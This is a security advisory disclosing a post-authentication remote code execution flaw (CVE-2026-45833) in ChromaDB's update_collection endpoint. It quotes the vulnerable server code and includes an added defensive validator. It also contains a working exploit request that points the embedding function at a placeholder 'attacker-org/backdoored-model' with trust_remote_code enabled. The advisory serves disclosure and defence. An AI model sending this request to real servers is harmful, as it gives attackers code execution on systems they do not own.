SAI Security Advisory

Post-Authentication RCE via update_collection

June 12, 2026

CVE Number

CVE-2026-45833

Summary

Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.

Products Impacted

This vulnerability affects ChromaDB versions from 0.4.17 to the latest Python release.

CVSS Score: 9.4

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE Categorization

CWE-94: Improper Control of Generation of Code (‘Code Injection’)

Details

In the V2 API, the update_collection handler (chromadb/server/fastapi/__init__.py:883-919) authenticates the caller and then loads the new configuration:

def process_update_collection(
    request: Request, collection_id: str, raw_body: bytes
) -> None:
    update = validate_model(UpdateCollection, orjson.loads(raw_body))
    self.sync_auth_request(
        request.headers,
        AuthzAction.UPDATE_COLLECTION,
        tenant, database_name, collection_id,
    )

    configuration = (
        None
        if not update.new_configuration
        else load_update_collection_configuration_from_json(
            update.new_configuration  # Dangerous code path
        )
    )

The load_update_collection_configuration_from_json() function (chromadb/api/collection_configuration.py:605-633) calls the same build_from_config() method that the create_collection path uses (the code path covered by CVE-2026-45829):

if json_map.get("embedding_function") is not None:
    # ...
    ef = known_embedding_functions[json_map["embedding_function"]["name"]]
    result["embedding_function"] = ef.build_from_config(
        json_map["embedding_function"]["config"]  # Model instantiation
    )

This means that trust_remote_code=True and a malicious model_name work identically through update_collection. The V1 variant at __init__.py:1920-1959 follows the same pattern: auth check at line 1932, config loading at lines 1939-1944.

Exploit request (requires UPDATE_COLLECTION permission):

PUT /api/v2/tenants/default_tenant/databases/default_database/collections/{collection_id} HTTP/1.1
Authorization: Bearer <valid-token>
Content-Type: application/json

{
    "new_configuration": {
        "embedding_function": {
            "name": "sentence_transformer",
            "type": "known",
            "config": {
                "model_name": "attacker-org/backdoored-model",
                "device": "cpu",
                "normalize_embeddings": false,
                "kwargs": {"trust_remote_code": true}
            }
        }
    }
}
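One mitigating check a deployment could place in front of load_update_collection_configuration_from_json(), as an added example that is not ChromaDB's own code: it parses the update body before any embedding function is built and rejects a configuration that enables trust_remote_code anywhere under embedding_function.config, or that names a model outside an allowlist. The function names, the policy, the allowlist and the sample bodies (placeholder model names) are this example's assumptions.

```python
from __future__ import annotations
import json
from typing import Any, Iterator, Optional

def _leaves(obj: dict, path: str = "") -> Iterator[tuple[str, Any]]:
    """Yield (dotted_path, value) for every non-dict value in a nested dict."""
    for key, val in obj.items():
        sub = f"{path}.{key}" if path else str(key)
        if isinstance(val, dict):
            yield from _leaves(val, sub)
        else:
            yield sub, val

def embedding_config_violations(new_configuration: dict,
                                allowed_models: Optional[frozenset] = None) -> list[str]:
    """Reasons to reject new_configuration (empty list == allowed). Policy is this
    example's, not ChromaDB's: any truthy trust_remote_code at any depth under
    embedding_function.config, or a model_name outside the allowlist when one is given."""
    ef = new_configuration.get("embedding_function")
    if ef is None:
        return []                                   # nothing will be instantiated
    cfg = ef.get("config") if isinstance(ef, dict) else None
    if not isinstance(cfg, dict):
        return ["embedding_function.config must be a JSON object"]
    reasons = []
    for path, value in _leaves(cfg):
        if path.rsplit(".", 1)[-1] == "trust_remote_code" and value:
            reasons.append(f"trust_remote_code enabled at embedding_function.config.{path}")
    model = cfg.get("model_name")
    if allowed_models is not None and model not in allowed_models:
        reasons.append(f"model_name {model!r} is not on the allowlist")
    return reasons

def validate_update_body(raw_body: bytes, allowed_models: Optional[frozenset] = None) -> list[str]:
    """Parse an update_collection body and apply the policy before any model is built."""
    try:
        body = json.loads(raw_body)
    except ValueError as exc:
        return [f"body is not valid JSON: {exc}"]
    new_cfg = body.get("new_configuration") if isinstance(body, dict) else None
    if not isinstance(new_cfg, dict):
        return []                                   # no configuration change requested
    return embedding_config_violations(new_cfg, allowed_models)

# Constructed sample bodies in the advisory's request shape; model names are placeholders.
MALICIOUS_BODY = json.dumps({"new_configuration": {"embedding_function": {"name":
    "sentence_transformer", "type": "known", "config": {"model_name": "example-org/untrusted-model",
    "device": "cpu", "kwargs": {"trust_remote_code": True}}}}}).encode()
BENIGN_BODY = json.dumps({"new_configuration": {"embedding_function": {"name":
    "sentence_transformer", "type": "known", "config": {"model_name": "all-MiniLM-L6-v2",
    "device": "cpu", "kwargs": {"trust_remote_code": False}}}}}).encode()
```

Rejecting the configuration here still leaves the collection's existing embedding function in place, so the check is safe to apply as a hard failure of the request.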

Timeline

  • February 17th, 2026 - Initial disclosure to ChromaDB via their security page, https://www.trychroma.com/security
  • February 24th, 2026 - Attempted follow-up through other trychroma e-mail addresses.
  • March 5th, 2026 - Attempted contact through IT-ISAC.
  • April 16th, 2026 - Attempted final follow-up through all previous channels and social media.
  • May 18th, 2026 - Publicly disclosed a first vulnerability; no response from the vendor.

Project URLs:

https://www.trychroma.com/

https://github.com/chroma-core/chroma/

RESEARCHER: Esteban Tonglet, Security Researcher, HiddenLayer
